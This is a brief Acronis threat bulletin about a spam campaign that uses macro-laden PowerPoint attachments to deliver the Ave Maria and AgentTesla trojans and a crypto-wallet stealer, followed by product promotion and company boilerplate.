An ongoing wave of spam is sending out emails with a dangerous PowerPoint attachment. This file contains an obfuscated macro that, once activated, uses a combination of PowerShell and Mshta to run its malicious payload — a script that downloads either the Ave Maria or AgentTesla malware.
These are two common trojans which can steal data, download further payloads, and disable Microsoft Defender. Some of these payloads are hosted on legitimate cloud services in order to appear more trustworthy. One of the additional modules that is being downloaded is an information stealer for cryptocurrency wallets, which also monitors the clipboard for any Bitcoin transaction address that could be discretely replaced with its own.
The Acronis Advanced Email Security pack blocks malicious emails from reaching users' inbox, while Acronis Cyber Protect’s self-defense capabilities protect the agent itself from manipulation.
Acronis is a Swiss company, founded in Singapore. Celebrating two decades of innovation, Acronis has more than 1,800 employees in 45 locations. The Acronis Cyber Protect Cloud solution is available in 26 languages in over 150 countries and is used by 20,000 service providers to protect over 750,000 businesses.